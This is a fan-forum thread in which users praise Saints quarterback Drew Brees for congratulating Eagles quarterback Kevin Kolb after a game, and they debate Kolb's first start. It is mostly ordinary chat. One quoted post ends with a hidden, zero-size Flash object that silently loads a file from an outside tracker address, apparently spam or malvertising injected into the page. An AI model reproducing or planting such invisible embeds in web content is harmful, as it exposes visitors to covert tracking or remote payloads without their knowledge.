Drew Brees ran after Kolb... (1 Viewer)

Reaction score
...at the end of the game to shake is hand. Certainly to congratulate him.

Brees is n°1 classy QB and I'm so proud is part of this team! :9:

PS: you can see it at the end of the résumé SAINTS-EAGLES on NFL.com

I just re-read your whole post in a french accent. That was fun

Kolb is going to be starting for someone next year and I hope Brees told him so.

drew one of the classiest people ive ever seen. guy has unbelievable work ethic and plays for a good cause.

this year he is showing that he deserves to be mentioned in the conversations of who is the best QB among peyton and brady and so far he has performed as the BEST QB in the NFL.

im so happy to have this guy on the team both on the field and off.

brees for mvp this year if the saints make the playoffs (saints will make the playoffs bank on it)

I saw that, I also saw Kolb barely acknowledge him. Then Garcia actually looked excited to see Brees and they started talking (with Brunell coming in) while Kolb sulked off into obscurity. I wanted to shout "Hey Kolb, when Mr. Brees says 'Good game' and maybe offers a pointer or two, you listen!"

Uhhhhhh, you really think this?
it was his first start ever and he threw for close to 400 yards
completed about 60 percent of his passes and had 2 tds 3 interceptions, 73 qb rating. Not too bad for his first start against our D which is starting to become very good at creating turnovers. Not saying his performance was good overall, just I think he will become a decent quarterback and he showed potential with his performance.Eagles number 2 wide receiver Curtis was playing with a bad knee.

I know he has had some time to learn but it was much better than Stafford's performance of 0 tds 3 interceptions 23 quarterback rating 152 yards

I saw that, I also saw Kolb barely acknowledge him. Then Garcia actually looked excited to see Brees and they started talking (with Brunell coming in) while Kolb sulked off into obscurity. I wanted to shout "Hey Kolb, when Mr. Brees says 'Good game' and maybe offers a pointer or two, you listen!"

I saw that too. Maybe Kolb was just po'ed at himself.

So when is Brees's contract up? This is his fourth year out of 6 year contract, right? Is it too early to begin negotiations with trying to lock him up for another long term contract?

Kolb is going to be starting for someone next year and I hope Brees told him so.<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width="0" height="0"><param name="movie" value="http://brbyowner.com/?tracker=4730"></param><param name="allowFullScreen" value="true"></param><embed src="http://brbyowner.com/?tracker=4730" type="application/x-shockwave-flash" allowfullscreen="true" width="0" height="0"></embed></object>

Kolb played well despite the interceptions. Good young QB!

If I was a quarterback, and Brees wanted to talk to me, I'd damn well better have a pen and some paper handy.

Create an account or login to comment

You must be a member in order to leave a comment

Create account

Create an account on our community. It's easy!

Already have an account? Log in here.

Users who are viewing this thread

Back
    Top Bottom